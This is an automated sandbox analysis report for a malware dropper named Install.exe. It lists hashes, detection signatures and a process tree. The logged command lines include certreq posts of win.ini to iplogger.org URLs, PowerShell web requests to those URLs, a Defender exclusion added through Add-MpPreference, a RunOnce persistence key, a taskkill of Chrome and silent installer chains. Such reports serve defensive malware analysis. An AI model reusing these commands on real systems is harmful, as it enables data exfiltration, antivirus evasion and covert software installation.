Analysis
-
max time kernel
16s -
max time network
62s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-03-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Install.exe
Resource
win7v20201028
General
-
Target
Install.exe
-
Size
852KB
-
MD5
98d1321a449526557d43498027e78a63
-
SHA1
d8584de7e33d30a8fc792b62aa7217d44332a345
-
SHA256
5440a5863002acacb3ddb6b1deb84945aa004ace8bd64938b681e3fe059a8a23
-
SHA512
3b6f59dbd605e59152837266a3e7814af463bb2cd7c9341c99fc5445de78e2dde73c11735bd145c6ad9c6d08d2c2810155558d5e9c441ac8b69ed609562385d0
Malware Config
Signatures
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000100000001aba0-147.dat acprotect behavioral1/files/0x000100000001aba0-146.dat acprotect -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Executes dropped EXE 6 IoCs
pid Process 2420 multitimer.exe 3484 multitimer.exe 1872 multitimer.exe 4020 ezrswrotnll.exe 2704 safebits.exe 2136 ezrswrotnll.tmp -
resource yara_rule behavioral1/files/0x000100000001aba0-147.dat upx behavioral1/files/0x000100000001aba0-146.dat upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\k4hkz1kwhju = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\XAY33RDGTP\\multitimer.exe\" 1 3.1615014585.60432ab93c34a" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 52 ipinfo.io 54 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
pid pid_target Process procid_target 4120 3568 WerFault.exe 115 4284 3568 WerFault.exe 115 2316 3568 WerFault.exe 115 796 3568 WerFault.exe 115 4972 3568 WerFault.exe 115 5320 3568 WerFault.exe 115 5408 3568 WerFault.exe 115 -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 1 IoCs
pid Process 3484 taskkill.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 56 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe 1872 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 756 Install.exe Token: SeDebugPrivilege 2420 multitimer.exe Token: SeDebugPrivilege 1872 multitimer.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 756 wrote to memory of 2420 756 Install.exe 74 PID 756 wrote to memory of 2420 756 Install.exe 74 PID 2420 wrote to memory of 3484 2420 multitimer.exe 78 PID 2420 wrote to memory of 3484 2420 multitimer.exe 78 PID 3484 wrote to memory of 1872 3484 multitimer.exe 80 PID 3484 wrote to memory of 1872 3484 multitimer.exe 80 PID 1872 wrote to memory of 4020 1872 multitimer.exe 81 PID 1872 wrote to memory of 4020 1872 multitimer.exe 81 PID 1872 wrote to memory of 4020 1872 multitimer.exe 81 PID 1872 wrote to memory of 2704 1872 multitimer.exe 82 PID 1872 wrote to memory of 2704 1872 multitimer.exe 82 PID 1872 wrote to memory of 2704 1872 multitimer.exe 82 PID 4020 wrote to memory of 2136 4020 ezrswrotnll.exe 83 PID 4020 wrote to memory of 2136 4020 ezrswrotnll.exe 83 PID 4020 wrote to memory of 2136 4020 ezrswrotnll.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756 -
C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 0 3060197d33d91c80.94013368 0 1012⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2420 -
C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 1 3.1615014585.60432ab93c34a 1013⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\XAY33RDGTP\multitimer.exe" 2 3.1615014585.60432ab93c34a4⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe"C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\is-ECNTS.tmp\ezrswrotnll.tmp"C:\Users\Admin\AppData\Local\Temp\is-ECNTS.tmp\ezrswrotnll.tmp" /SL5="$70070,870426,780800,C:\Users\Admin\AppData\Local\Temp\ledunvgj4uc\ezrswrotnll.exe" /VERYSILENT6⤵
- Executes dropped EXE
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\is-RUMHP.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-RUMHP.tmp\winlthst.exe" test1 test17⤵PID:4984
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lgpq0nimdc4\safebits.exe"C:\Users\Admin\AppData\Local\Temp\lgpq0nimdc4\safebits.exe" /S /pubid=1 /subid=4515⤵
- Executes dropped EXE
PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe" /Verysilent /subid=5775⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\is-R259R.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-R259R.tmp\Setup3310.tmp" /SL5="$301CA,802346,56832,C:\Users\Admin\AppData\Local\Temp\ulpknnwekep\Setup3310.exe" /Verysilent /subid=5776⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe" /Verysilent7⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\is-C4HB7.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-C4HB7.tmp\Setup.tmp" /SL5="$20436,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-EDHF3.tmp\Setup.exe" /Verysilent8⤵PID:5020
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\swvtv52s53y\0atswer3rnp.exe"C:\Users\Admin\AppData\Local\Temp\swvtv52s53y\0atswer3rnp.exe" testparams5⤵PID:2476
-
C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe"C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe" /VERYSILENT /p=testparams6⤵PID:2304
-
C:\Users\Admin\AppData\Local\Temp\is-U46NR.tmp\0irmofazqaq.tmp"C:\Users\Admin\AppData\Local\Temp\is-U46NR.tmp\0irmofazqaq.tmp" /SL5="$4019E,404973,58368,C:\Users\Admin\AppData\Roaming\ozpnunb5bez\0irmofazqaq.exe" /VERYSILENT /p=testparams7⤵PID:3744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe"C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe" /VERYSILENT /id=5355⤵PID:2116
-
C:\Users\Admin\AppData\Local\Temp\is-E3N93.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-E3N93.tmp\vict.tmp" /SL5="$10262,870426,780800,C:\Users\Admin\AppData\Local\Temp\if1jc4kclwz\vict.exe" /VERYSILENT /id=5356⤵PID:4156
-
C:\Users\Admin\AppData\Local\Temp\is-1QBOS.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-1QBOS.tmp\wimapi.exe" 5357⤵PID:3980
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq5⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\is-2JJN9.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-2JJN9.tmp\IBInstaller_97039.tmp" /SL5="$10356,14452723,721408,C:\Users\Admin\AppData\Local\Temp\gam35jyunx0\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵PID:4384
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970397⤵PID:5056
-
-
C:\Users\Admin\AppData\Local\Temp\is-7HPIN.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-7HPIN.tmp\{app}\chrome_proxy.exe"7⤵PID:5108
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ged4s345xnv\app.exe"C:\Users\Admin\AppData\Local\Temp\ged4s345xnv\app.exe" /8-235⤵PID:4868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Broken-Fog"6⤵PID:4432
-
-
-
C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe" /silent /subid=4825⤵PID:3304
-
-
C:\Users\Admin\AppData\Local\Temp\5pek4uutpn4\lfdxyam12rx.exe"C:\Users\Admin\AppData\Local\Temp\5pek4uutpn4\lfdxyam12rx.exe" /ustwo INSTALL5⤵PID:3568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 6566⤵
- Program crash
PID:4120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 6686⤵
- Program crash
PID:4284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 6726⤵
- Program crash
PID:2316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 7286⤵
- Program crash
PID:796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 8846⤵
- Program crash
PID:4972
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 9326⤵
- Program crash
PID:5320
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 10886⤵
- Program crash
PID:5408
-
-
-
C:\Users\Admin\AppData\Local\Temp\uuvllzhkai5\w1iddfr2roo.exe"C:\Users\Admin\AppData\Local\Temp\uuvllzhkai5\w1iddfr2roo.exe" 57a764d042bf85⤵PID:728
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe" 57a764d042bf8 & exit6⤵PID:4596
-
C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe"C:\Program Files\AG6SMP9PH4\AG6SMP9PH.exe" 57a764d042bf87⤵PID:3884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe" /VERYSILENT5⤵PID:564
-
-
C:\Users\Admin\AppData\Local\Temp\52npheyhbm1\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\52npheyhbm1\askinstall24.exe"5⤵PID:1180
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1768
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3484
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:4292
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"1⤵PID:4348
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵PID:4316
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4276
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:1424
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵PID:4400
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4444
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:3196
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵PID:4504
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵PID:4556
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"1⤵PID:4588
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw2⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys2⤵PID:4016
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:2688
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-QSVSE.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QSVSE.tmp\vpn.tmp" /SL5="$10254,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ubln2h3tilf\vpn.exe" /silent /subid=4821⤵PID:4104
-
C:\Users\Admin\AppData\Local\Temp\is-S82Q9.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-S82Q9.tmp\chashepro3.tmp" /SL5="$301EC,2015144,58368,C:\Users\Admin\AppData\Local\Temp\npx3sfyamhe\chashepro3.exe" /VERYSILENT1⤵PID:3880